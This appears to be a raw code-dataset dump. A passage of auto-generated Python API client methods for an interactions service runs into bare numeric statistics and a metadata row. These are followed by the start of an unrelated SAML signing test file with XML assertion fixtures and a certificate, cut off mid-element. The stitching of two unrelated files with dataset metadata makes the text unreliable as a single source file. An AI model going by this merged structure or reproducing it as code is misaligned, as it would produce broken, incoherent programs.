""" all_params = ['interaction_id', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method unsubscribe_interaction" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `unsubscribe_interaction`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `unsubscribe_interaction`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `unsubscribe_interaction`") resource_path = '/interactions/{interactionId}/unsubscribe'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ 
select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteraction', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def update_interaction(self, interaction_id, interaction_title, requester_id, client_token, **kwargs): """ Update interaction Allows the user to update interaction. Returns the updated interaction This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.update_interaction(interaction_id, interaction_title, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str interaction_title: Interaction Title (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_description: Describe Interaction :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. 
To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.update_interaction_with_http_info(interaction_id, interaction_title, requester_id, client_token, **kwargs) else: (data) = self.update_interaction_with_http_info(interaction_id, interaction_title, requester_id, client_token, **kwargs) return data def update_interaction_with_http_info(self, interaction_id, interaction_title, requester_id, client_token, **kwargs): """ Update interaction Allows the user to update interaction. Returns the updated interaction This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.update_interaction_with_http_info(interaction_id, interaction_title, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param str interaction_title: Interaction Title (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. 
Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str interaction_description: Describe Interaction :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteraction If the method is called asynchronously, returns the request thread. """ all_params = ['interaction_id', 'interaction_title', 'requester_id', 'client_token', 'interaction_description', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_interaction" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `update_interaction`") # verify the required parameter 'interaction_title' is set if ('interaction_title' not in params) or (params['interaction_title'] is None): raise ValueError("Missing the required parameter `interaction_title` when calling `update_interaction`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `update_interaction`") # verify the required parameter 'client_token' is set if 
('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `update_interaction`") resource_path = '/interactions/{interactionId}'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'interaction_title' in params: form_params.append(('interactionTitle', params['interaction_title'])) if 'interaction_description' in params: form_params.append(('interactionDescription', params['interaction_description'])) if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'PUT', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteraction', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def update_interaction_category(self, category_id, category_name, requester_id, client_token, **kwargs): """ Update interaction category Allows the user to update the interaction category. Returns the updated interaction category This method makes a synchronous HTTP request by default. 
To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.update_interaction_category(category_id, category_name, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int category_id: categoryId (required) :param str category_name: Category Name (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str category_description: Describe category :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionCategory If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.update_interaction_category_with_http_info(category_id, category_name, requester_id, client_token, **kwargs) else: (data) = self.update_interaction_category_with_http_info(category_id, category_name, requester_id, client_token, **kwargs) return data def update_interaction_category_with_http_info(self, category_id, category_name, requester_id, client_token, **kwargs): """ Update interaction category Allows the user to update the interaction category. Returns the updated interaction category This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. 
>>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.update_interaction_category_with_http_info(category_id, category_name, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int category_id: categoryId (required) :param str category_name: Category Name (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str category_description: Describe category :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionCategory If the method is called asynchronously, returns the request thread. 
""" all_params = ['category_id', 'category_name', 'requester_id', 'client_token', 'category_description', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_interaction_category" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'category_id' is set if ('category_id' not in params) or (params['category_id'] is None): raise ValueError("Missing the required parameter `category_id` when calling `update_interaction_category`") # verify the required parameter 'category_name' is set if ('category_name' not in params) or (params['category_name'] is None): raise ValueError("Missing the required parameter `category_name` when calling `update_interaction_category`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `update_interaction_category`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `update_interaction_category`") resource_path = '/interactions/categories/{categoryId}'.replace('{format}', 'json') path_params = {} if 'category_id' in params: path_params['categoryId'] = params['category_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'category_name' in params: form_params.append(('categoryName', params['category_name'])) if 'category_description' 
in params: form_params.append(('categoryDescription', params['category_description'])) if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'PUT', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionCategory', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only')) def update_response(self, response_id, response, requester_id, client_token, **kwargs): """ Update response Allows the user to update an response. Returns the updated response This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.update_response(response_id, response, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int response_id: responseId (required) :param str response: response (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. 
Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.update_response_with_http_info(response_id, response, requester_id, client_token, **kwargs) else: (data) = self.update_response_with_http_info(response_id, response, requester_id, client_token, **kwargs) return data def update_response_with_http_info(self, response_id, response, requester_id, client_token, **kwargs): """ Update response Allows the user to update an response. Returns the updated response This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.update_response_with_http_info(response_id, response, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int response_id: responseId (required) :param str response: response (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. 
Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponse If the method is called asynchronously, returns the request thread. """ all_params = ['response_id', 'response', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method update_response" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'response_id' is set if ('response_id' not in params) or (params['response_id'] is None): raise ValueError("Missing the required parameter `response_id` when calling `update_response`") # verify the required parameter 'response' is set if ('response' not in params) or (params['response'] is None): raise ValueError("Missing the required parameter `response` when calling `update_response`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `update_response`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `update_response`") resource_path = 
'/interactions/responses/{responseId}'.replace('{format}', 'json') path_params = {} if 'response_id' in params: path_params['responseId'] = params['response_id'] query_params = {} header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: header_params['accessToken'] = params['access_token'] if 'client_token' in params: header_params['clientToken'] = params['client_token'] form_params = [] local_var_files = {} if 'response' in params: form_params.append(('response', params['response'])) if 'fields' in params: form_params.append(('fields', params['fields'])) body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.\ select_header_accept(['application/json']) if not header_params['Accept']: del header_params['Accept'] # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.\ select_header_content_type(['application/x-www-form-urlencoded']) # Authentication setting auth_settings = ['default'] return self.api_client.call_api(resource_path, 'PUT', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='VerveResponseInteractionResponse', auth_settings=auth_settings, callback=params.get('callback'), _return_http_data_only=params.get('_return_http_data_only'))
57.871152
583
0.624195
28,436
263,198
5.59706
0.013152
0.038773
0.033175
0.030963
0.98663
0.981276
0.978543
0.974786
0.971425
0.965437
0
0.007279
0.297932
263,198
4,547
584
57.883879
0.854045
0.441383
0
0.81592
0
0
0.254012
0.060307
0
0
0
0
0
1
0.030303
false
0
0.003166
0
0.078697
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
71e756ec18cb00cddfdb014e810af003956d5f0a
23,700
py
Python
idptest/tests/test_signing.py
NoodleMarkets/dj-saml-idp
ba2a4ef59b6bd35ac652066a08c1aedfbd8779fc
[ "MIT" ]
2
2019-12-23T06:30:10.000Z
2022-02-19T21:05:52.000Z
idptest/tests/test_signing.py
NoodleMarkets/dj-saml-idp
ba2a4ef59b6bd35ac652066a08c1aedfbd8779fc
[ "MIT" ]
null
null
null
idptest/tests/test_signing.py
NoodleMarkets/dj-saml-idp
ba2a4ef59b6bd35ac652066a08c1aedfbd8779fc
[ "MIT" ]
2
2018-06-26T06:20:25.000Z
2020-07-21T02:43:59.000Z
# -*- coding: utf-8 -*- from __future__ import absolute_import import os import unittest import lxml.etree as ET from xmlunittest import XmlTestMixin from saml2idp import xml_render from saml2idp import xml_signing, xml_templates from saml2idp import saml2idp_metadata as smd from saml2idp.xml_signing import get_signature_xml IDP_PARAMS = { 'ISSUER': 'http://127.0.0.1:8000', } REQUEST_PARAMS = { 'ACS_URL': 'https://www.example.net/a/example.com/acs', 'REQUEST_ID': 'mpjibjdppiodcpciaefmdahiipjpcghdcfjodkbi', } ASSERTION_SALESFORCE_PARAMS = { 'ASSERTION_ID': '_7ccdda8bc6b328570c03b218d7521772998da45374', 'ASSERTION_SIGNATURE': '', # it's unsigned 'AUDIENCE': 'example.net', 'AUTH_INSTANT': '2011-08-11T23:38:34Z', 'ISSUE_INSTANT': '2011-08-11T23:38:34Z', 'NOT_BEFORE': '2011-08-11T23:38:04Z', 'NOT_ON_OR_AFTER': '2011-08-11T23:43:34Z', 'SESSION_NOT_ON_OR_AFTER': '2011-08-12T07:38:34Z', 'SP_NAME_QUALIFIER': 'example.net', 'SUBJECT': 'randomuser@example.com', 'SUBJECT_FORMAT': 'urn:oasis:names:tc:SAML:2.0:nameid-format:email', '': 'b7HwOJQgKYvhWcrUH17T8WXTY24=' } ASSERTION_SALESFORCE_STR = '<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_7ccdda8bc6b328570c03b218d7521772998da45374" IssueInstant="2011-08-11T23:38:34Z" Version="2.0"><saml:Issuer>http://127.0.0.1:8000</saml:Issuer><saml:Subject><saml:NameID Format="urn:oasis:names:tc:SAML:2.0:nameid-format:email" SPNameQualifier="example.net">randomuser@example.com</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData InResponseTo="mpjibjdppiodcpciaefmdahiipjpcghdcfjodkbi" NotOnOrAfter="2011-08-11T23:43:34Z" Recipient="https://www.example.net/a/example.com/acs"></saml:SubjectConfirmationData></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="2011-08-11T23:38:04Z" 
NotOnOrAfter="2011-08-11T23:43:34Z"><saml:AudienceRestriction><saml:Audience>example.net</saml:Audience></saml:AudienceRestriction></saml:Conditions><saml:AuthnStatement AuthnInstant="2011-08-11T23:38:34Z"><saml:AuthnContext><saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef></saml:AuthnContext></saml:AuthnStatement></saml:Assertion>' ASSERTION_SALESFORCE_XML = ET.XML(ASSERTION_SALESFORCE_STR) SIGNED_ASSERTION_SALESFORCE_STR = '<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_7ccdda8bc6b328570c03b218d7521772998da45374" IssueInstant="2011-08-11T23:38:34Z" Version="2.0"><saml:Issuer>http://127.0.0.1:8000</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"></ds:CanonicalizationMethod><ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"></ds:SignatureMethod><ds:Reference URI="#_7ccdda8bc6b328570c03b218d7521772998da45374"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"></ds:Transform><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"></ds:Transform></ds:Transforms><ds:DigestMethod 
Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"></ds:DigestMethod><ds:DigestValue>b7HwOJQgKYvhWcrUH17T8WXTY24=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>WP+9aFiuj52WLW6ebwSaQhF2nU/wtyP3E2dudTa6mVTSjItpqduUqWR3rp/q39Hsehde6i+4RlbGQkZUwZSPEw==</ds:SignatureValue><ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICKzCCAdWgAwIBAgIJAM8DxRNtPj90MA0GCSqGSIb3DQEBBQUAMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwHhcNMTEwODEyMjA1MTIzWhcNMTIwODExMjA1MTIzWjBFMQswCQYDVQQGEwJBVTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANcNmgm4YlSUAr2xdWei5aRU/DbWtsQ47gjkv28Ekje3ob+6q0M+D5phwYDcv9ygYmuJ5wOi1cPprsWdFWmvSusCAwEAAaOBpzCBpDAdBgNVHQ4EFgQUzyBR9+vE8bygqvD6CZ/w6aQPikMwdQYDVR0jBG4wbIAUzyBR9+vE8bygqvD6CZ/w6aQPikOhSaRHMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGSCCQDPA8UTbT4/dDAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA0EAIQuPLA/mlMJAMF680kL7reX5WgyRwAtRzJK6FgNjE7kRaLZQ79UKYVYa0VAyrRdoNEyVhG4tJFEiQJzaLWsl/A==</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><saml:Subject><saml:NameID Format="urn:oasis:names:tc:SAML:2.0:nameid-format:email" SPNameQualifier="example.net">randomuser@example.com</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData InResponseTo="mpjibjdppiodcpciaefmdahiipjpcghdcfjodkbi" NotOnOrAfter="2011-08-11T23:43:34Z" Recipient="https://www.example.net/a/example.com/acs"></saml:SubjectConfirmationData></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="2011-08-11T23:38:04Z" NotOnOrAfter="2011-08-11T23:43:34Z"><saml:AudienceRestriction><saml:Audience>example.net</saml:Audience></saml:AudienceRestriction></saml:Conditions><saml:AuthnStatement 
AuthnInstant="2011-08-11T23:38:34Z"><saml:AuthnContext><saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef></saml:AuthnContext></saml:AuthnStatement></saml:Assertion>' SIGNED_ASSERTION_SALESFORCE_XML = ET.XML(SIGNED_ASSERTION_SALESFORCE_STR) RESPONSE_PARAMS = { 'ASSERTION': '', 'ISSUE_INSTANT': '2011-08-11T23:38:34Z', 'NOT_ON_OR_AFTER': '2011-08-11T23:43:34Z', 'RESPONSE_ID': '_2972e82c07bb5453956cc11fb19cad97ed26ff8bb4', 'RESPONSE_SIGNATURE': '', 'SP_NAME_QUALIFIER': 'example.net', 'SUBJECT': 'randomuser@example.com', 'SUBJECT_FORMAT': 'urn:oasis:names:tc:SAML:2.0:nameid-format:email', } RESPONSE_XML = '<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" Destination="https://www.example.net/a/example.com/acs" ID="_2972e82c07bb5453956cc11fb19cad97ed26ff8bb4" InResponseTo="mpjibjdppiodcpciaefmdahiipjpcghdcfjodkbi" IssueInstant="2011-08-11T23:38:34Z" Version="2.0"><saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://127.0.0.1:8000</saml:Issuer><samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"></samlp:StatusCode></samlp:Status><saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_7ccdda8bc6b328570c03b218d7521772998da45374" IssueInstant="2011-08-11T23:38:34Z" Version="2.0"><saml:Issuer>http://127.0.0.1:8000</saml:Issuer><saml:Subject><saml:NameID Format="urn:oasis:names:tc:SAML:2.0:nameid-format:email" SPNameQualifier="example.net">randomuser@example.com</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData InResponseTo="mpjibjdppiodcpciaefmdahiipjpcghdcfjodkbi" NotOnOrAfter="2011-08-11T23:43:34Z" Recipient="https://www.example.net/a/example.com/acs"></saml:SubjectConfirmationData></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="2011-08-11T23:38:04Z" 
NotOnOrAfter="2011-08-11T23:43:34Z"><saml:AudienceRestriction><saml:Audience>example.net</saml:Audience></saml:AudienceRestriction></saml:Conditions><saml:AuthnStatement AuthnInstant="2011-08-11T23:38:34Z"><saml:AuthnContext><saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:Password</saml:AuthnContextClassRef></saml:AuthnContext></saml:AuthnStatement></saml:Assertion></samlp:Response>' RESPONSE_WITH_SIGNED_ASSERTION_SALESFORCE_XML = '<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" Destination="https://www.example.net/a/example.com/acs" ID="_2972e82c07bb5453956cc11fb19cad97ed26ff8bb4" InResponseTo="mpjibjdppiodcpciaefmdahiipjpcghdcfjodkbi" IssueInstant="2011-08-11T23:38:34Z" Version="2.0"><saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">http://127.0.0.1:8000</saml:Issuer><samlp:Status><samlp:StatusCode Value="urn:oasis:names:tc:SAML:2.0:status:Success"></samlp:StatusCode></samlp:Status><saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_7ccdda8bc6b328570c03b218d7521772998da45374" IssueInstant="2011-08-11T23:38:34Z" Version="2.0"><saml:Issuer>http://127.0.0.1:8000</saml:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"></ds:CanonicalizationMethod><ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"></ds:SignatureMethod><ds:Reference URI="#_7ccdda8bc6b328570c03b218d7521772998da45374"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"></ds:Transform><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"></ds:Transform></ds:Transforms><ds:DigestMethod 
Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"></ds:DigestMethod><ds:DigestValue>b7HwOJQgKYvhWcrUH17T8WXTY24=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>WP+9aFiuj52WLW6ebwSaQhF2nU/wtyP3E2dudTa6mVTSjItpqduUqWR3rp/q39Hsehde6i+4RlbGQkZUwZSPEw==</ds:SignatureValue><ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIICKzCCAdWgAwIBAgIJAM8DxRNtPj90MA0GCSqGSIb3DQEBBQUAMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwHhcNMTEwODEyMjA1MTIzWhcNMTIwODExMjA1MTIzWjBFMQswCQYDVQQGEwJBVTETMBEGA1UECBMKU29tZS1TdGF0ZTEhMB8GA1UEChMYSW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANcNmgm4YlSUAr2xdWei5aRU/DbWtsQ47gjkv28Ekje3ob+6q0M+D5phwYDcv9ygYmuJ5wOi1cPprsWdFWmvSusCAwEAAaOBpzCBpDAdBgNVHQ4EFgQUzyBR9+vE8bygqvD6CZ/w6aQPikMwdQYDVR0jBG4wbIAUzyBR9+vE8bygqvD6CZ/w6aQPikOhSaRHMEUxCzAJBgNVBAYTAkFVMRMwEQYDVQQIEwpTb21lLVN0YXRlMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGSCCQDPA8UTbT4/dDAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA0EAIQuPLA/mlMJAMF680kL7reX5WgyRwAtRzJK6FgNjE7kRaLZQ79UKYVYa0VAyrRdoNEyVhG4tJFEiQJzaLWsl/A==</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><saml:Subject><saml:NameID Format="urn:oasis:names:tc:SAML:2.0:nameid-format:email" SPNameQualifier="example.net">randomuser@example.com</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData InResponseTo="mpjibjdppiodcpciaefmdahiipjpcghdcfjodkbi" NotOnOrAfter="2011-08-11T23:43:34Z" Recipient="https://www.example.net/a/example.com/acs"></saml:SubjectConfirmationData></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="2011-08-11T23:38:04Z" NotOnOrAfter="2011-08-11T23:43:34Z"><saml:AudienceRestriction><saml:Audience>example.net</saml:Audience></saml:AudienceRestriction></saml:Conditions><saml:AuthnStatement 
